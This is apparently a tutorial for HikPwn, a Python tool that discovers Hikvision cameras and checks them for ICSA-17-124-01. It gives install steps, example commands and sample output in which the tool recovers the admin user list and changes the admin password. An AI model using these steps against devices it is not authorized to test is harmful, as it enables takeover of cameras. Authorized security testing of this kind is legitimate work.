If you’re searching for an efficient way to discover and test Hikvision network devices for vulnerabilities, HikPwn is a standout tool for both security researchers and network administrators. This guide provides a detailed walkthrough of HikPwn > its core features, installation, setup, and utilization.
HikPwn is a Python-based scanner specifically designed for Hikvision devices, offering both passive and active network enumeration. Written in Python 3.8, it provides basic vulnerability scanning capabilities, notably for the widely-known ICSA-17-124-01 vulnerability, which may grant admin-level access if exploited successfully. HikPwn is an open-source project intended for educational and security testing purposes only.
Note: Upcoming features include support for direct target scanning and detection of CVE-2021-36260.
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
Install all required Python packages using pip:
pip install -r requirements.txt
If you encounter permissions issues, run the command with sudo
.
HikPwn offers both passive and active scanning with simple command-line options:
python3 hikpwn.py --interface <INTERFACE> --address <IP_ADDRESS> [--active] [--ICSA_17_124_01]
Argument | Description |
---|---|
--interface INTERFACE | Network interface to use (e.g., eth0) |
--address ADDRESS | IP address of selected interface |
--active | Enable active device discovery |
--ICSA_17_124_01 | Enable ICSA-17-124-01 vulnerability detection |
-h, --help | Show help message and exit |
python3 hikpwn.py --interface eth0 --address 192.168.1.10 --active
python3 hikpwn.py --interface eth0 --address 192.168.1.10 --ICSA_17_124_01
Results are automatically saved to ./log.txt
for later review.
Using eth0 as network interface and 192.168.1.10 as its IP address...
[*] Started 30 seconds of both passive and active discovery...
================================================================================
[*] Total detected devices: 1
192.168.1.20
================================================================================
[*] Active discovery's results:
DEVICE #1:
----------------------------------------------
Serial Number: xxxxxxxxxxxxxxxxxxxxx
Description: DS-2DE4220IW-D
MAC: XX:XX:XX:XX:XX:XX
IP: 192.168.1.20
DHCP in use: false
Software Version: V5.4.3 build 160810
DSP Version: V7.3 build 160801
Boot Time: 2019-03-01 00:05:33
Activation Status: true
Password Reset Ability: true
================================================================================
[*] Passive discovery's results:
DEVICE #1: Detected device with IP address 192.168.1.20 and MAC address XX:XX:XX:XX:XX:XX.
================================================================================
[*] Starting scan for ICSA-17-124-01...
192.168.1.20 is vulnerable to ICSA_17_124_01. Recovered user list:
user_id: 1, user_name: admin, priority: high, user_level: Administrator
Do you want to exploit the vulnerability and try to change admin's password? (y/n)
>>> y
Enter a password composed of numbers and letters (8-12 characters):
>>>
Password change successful.
HikPwn is for educational and authorized security testing only. Do not use this tool for unauthorized scanning or exploitation of networks and devices. Misuse may be illegal and unethical.
If you’re learning Bash scripting, one of the most useful features you’ll come across is…
If you are new to Bash scripting or Linux shell scripting, one of the most…
How Does a Firewall Work Step by Step? What Is a Firewall and How Does…
ROADTools is a powerful framework designed for exploring and interacting with Microsoft Azure Active Directory…
Microsoft 365 Groups (also known as M365 Groups or Unified Groups) are at the heart…
SeamlessPass is a specialized tool designed to leverage on-premises Active Directory Kerberos tickets to obtain…